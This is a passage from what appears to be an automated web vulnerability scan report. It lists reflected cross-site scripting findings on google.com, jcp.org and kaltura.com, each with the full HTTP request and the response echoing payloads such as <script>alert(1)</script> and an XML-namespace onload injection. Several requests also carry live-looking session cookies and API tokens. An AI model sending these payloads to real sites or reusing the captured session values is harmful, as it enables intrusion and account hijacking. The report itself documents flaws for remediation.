User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:33:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 15577

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8">
<TITLE>Free Usenet News Servers Index and Search Tools</TITLE>
<META content="Usenet, binaries Newsgroups, giganews, n
...[SNIP]...
<font size=2 face='Arial, Helvetica, sans-serif' >Found 10 newsgroups for xss52539<script>alert(1)</script>ab8e54a56626fa6f2</font>
...[SNIP]...

4.210. http://www.google.com/search [tch parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 36039(a)594dec5b627 was submitted in the tch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?sclient=psy-ab&hl=en&source=hp&q=vdi&pbx=1&oq=vdi&aq=f&aqi=g-e4&aql=&gs_sm=e&gs_upl=14925l16302l0l16457l3l3l0l0l0l0l1364l1364l7-1l1l0&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870&tch=136039(a)594dec5b627&ech=1&psi=e-hzTu6UEazYiAKVrZS0Ag.1316237087043.3 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: sXoKgwNA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:24:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 75731

NKGaDyNz....S....%..Y....M.....5..:<!doctype html><title>vdi - Google Search</title><script>(function(){var jesr_base_page_version=21;var jesr_user_state='9b3eddd0';var jesr_signal_base_page_change=f
...[SNIP]...
m\\x3de\\x26amp;gs_upl\\x3d14925l16302l0l16457l3l3l0l0l0l0l1364l1364l7-1l1l0\\x26amp;bav\\x3don.2,or.r_gc.r_pw.\\x26amp;fp\\x3db659e1e8b520709\\x26amp;biw\\x3d1087\\x26amp;bih\\x3d870\\x26amp;tch\\x3d136039(a)594dec5b627\\x26amp;ech\\x3d1\\x26amp;psi\\x3de-hzTu6UEazYiAKVrZS0Ag.1316237087043.3\x27)});});r();var l\x3dSN...Q\x27#\x27)):\x27#\x27;if(l\x3d\x3d\x27#\x27\x26\x26google.defre){google.defre\x3dc,~.*\x26\x26goog
...[SNIP]...

4.211. http://www.jcp.org/en/home/index [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jcp.org
Path:   /en/home/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6f0"><script>alert(1)</script>1f1ab2b8945 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/home/indexde6f0"><script>alert(1)</script>1f1ab2b8945 HTTP/1.1
Host: www.jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jcp.org/en/jsr/detail?id=2342988c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E6a2be8e6b8e
Cookie: JSESSIONID=48F45D27182FAA87A47D8633F73BD701

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 01:54:31 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 13309


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>



...[SNIP]...
<input name="url" value="http://www.jcp.org/en/home/indexde6f0"><script>alert(1)</script>1f1ab2b8945" type="hidden">
...[SNIP]...

4.212. http://www.jcp.org/en/home/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jcp.org
Path:   /en/home/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4bf"><script>alert(1)</script>3d1e73d28a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/home/index?6d4bf"><script>alert(1)</script>3d1e73d28a4=1 HTTP/1.1
Host: www.jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jcp.org/en/jsr/detail?id=2342988c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E6a2be8e6b8e
Cookie: JSESSIONID=48F45D27182FAA87A47D8633F73BD701

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 17 Sep 2011 01:54:29 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 27335


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

...[SNIP]...
<input name="uri" value="/en/home/index?6d4bf"><script>alert(1)</script>3d1e73d28a4=1" type="hidden">
...[SNIP]...

4.213. http://www.jcp.org/en/jsr/detail [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jcp.org
Path:   /en/jsr/detail

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2988c"><script>alert(1)</script>6a2be8e6b8e was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/jsr/detail?id=2342988c"><script>alert(1)</script>6a2be8e6b8e HTTP/1.1
Host: www.jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/java/find/standards/

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:59 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 12233


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

...[SNIP]...
<input name="uri" value="/en/jsr/detail?id=2342988c"><script>alert(1)</script>6a2be8e6b8e" type="hidden">
...[SNIP]...

4.214. http://www.jcp.org/en/jsr/detail [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jcp.org
Path:   /en/jsr/detail

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce239"><script>alert(1)</script>deede0f2c46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/jsr/detail?id=234&ce239"><script>alert(1)</script>deede0f2c46=1 HTTP/1.1
Host: www.jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/java/find/standards/

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:59 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 35805


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

...[SNIP]...
<input name="uri" value="/en/jsr/detail?id=234&ce239"><script>alert(1)</script>deede0f2c46=1" type="hidden">
...[SNIP]...

4.215. http://www.kaltura.com//api_v3/index.php [1%3Aaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 1%3Aaction request parameter is copied into the XML document as plain text between tags. The payload 90f1d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99f67c68c45 was submitted in the 1%3Aaction parameter. This input was echoed as 90f1d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99f67c68c45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get90f1d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99f67c68c45&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:57:41 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00018095970153809
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00019192695617676
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00016498565673828
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 2140
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><error><code>ACTION_DOES_NOT_EXISTS</code><message>Action "get90f1d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99f67c68c45" does not exists for service "baseentry"</message>
...[SNIP]...

4.216. http://www.kaltura.com//api_v3/index.php [1%3AentryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 1%3AentryId request parameter is copied into the XML document as plain text between tags. The payload 27eda<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>815d285c2f was submitted in the 1%3AentryId parameter. This input was echoed as 27eda<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>815d285c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu27eda<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>815d285c2f&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:35 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00022196769714355
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00019288063049316
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.0001680850982666
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 2113
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><error><code>ENTRY_ID_NOT_FOUND</code><message>Entry id "1_6mbkzzuu27eda<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>815d285c2f" not found</message>
...[SNIP]...

4.217. http://www.kaltura.com//api_v3/index.php [1%3Aservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 1%3Aservice request parameter is copied into the XML document as plain text between tags. The payload a0bb4<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>29f9016f371 was submitted in the 1%3Aservice parameter. This input was echoed as a0bb4<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>29f9016f371 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentrya0bb4<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>29f9016f371&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:13 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,b87fa6591bd6b8e5a78a06b79a38679a,0.00020194053649902
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00018000602722168
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00015807151794434
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 2124
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><error><code>SERVICE_DOES_NOT_EXISTS</code><message>Service "baseentrya0bb4<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>29f9016f371" does not exists</message>
...[SNIP]...

4.218. http://www.kaltura.com//api_v3/index.php [2%3Aaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 2%3Aaction request parameter is copied into the XML document as plain text between tags. The payload a1ef8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>46d932ea485 was submitted in the 2%3Aaction parameter. This input was echoed as a1ef8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>46d932ea485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuu&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryIda1ef8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>46d932ea485&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:59:01 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.00019216537475586
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00023603439331055
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00016498565673828
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3054
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Action "getWebPlayableByEntryIda1ef8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>46d932ea485" does not exists for service "flavorasset"</message>
...[SNIP]...

4.219. http://www.kaltura.com//api_v3/index.php [2%3AentryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   //api_v3/index.php

Issue detail

The value of the 2%3AentryId request parameter is copied into the XML document as plain text between tags. The payload b90a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>207988630d4 was submitted in the 2%3AentryId parameter. This input was echoed as b90a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>207988630d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET //api_v3/index.php?service=multirequest&action=null&kalsig=35b5ede8cd1c622f2acf565d1c38cd52&1%3Aservice=baseentry&1%3AentryId=1%5F6mbkzzuu&2%3Aservice=flavorasset&4%3Afilter%3AobjectType=KalturaCuePointFilter&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&4%3Afilter%3AentryIdEqual=1%5F6mbkzzuu&3%3AentryId=1%5F6mbkzzuu&3%3AcontextDataParams%3Areferrer=http%3A%2F%2Fwww%2Etmz%2Ecom%2F&2%3AentryId=1%5F6mbkzzuub90a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>207988630d4&4%3Aservice=cuepoint%5Fcuepoint&clientTag=kdp%3Av3%2E5%2E17%2E6&1%3Aaction=get&4%3Aaction=list&1%3Aversion=%2D1&3%3Aservice=baseentry&2%3Aaction=getWebPlayableByEntryId&ignoreNull=1&3%3AcontextDataParams%3AobjectType=KalturaEntryContextDataParams&3%3Aaction=getContextData HTTP/1.1
Host: www.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:56:47 GMT
Server: Apache
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,8367364c8cbfcae00c5d0a59e62daca8,0.00021100044250488
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,af268fcbf1c901b0f173e67272aa3e3f,0.00018811225891113
X-Kaltura-Part-Of-MultiRequest: cached-dispatcher,08dc7188ad81536fcd12ce12af4d9a4a,0.00018000602722168
Vary: Accept-Encoding
X-Me: pa-apache2
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3006
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?><xml><result><item><objectType>KalturaMediaEntry</objectType><id>1_6mbkzzuu</id><name>Stevie Wonder: It&apos;s a Case of Steve Jobs Leading the Blind</name><descr
...[SNIP]...
<message>Entry id "1_6mbkzzuub90a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>207988630d4" not found</message>
...[SNIP]...

4.220. http://www.kaltura.com//api_v3/index.php [2%3Aservice parameter]  previous  next

Summary

Severity:   High
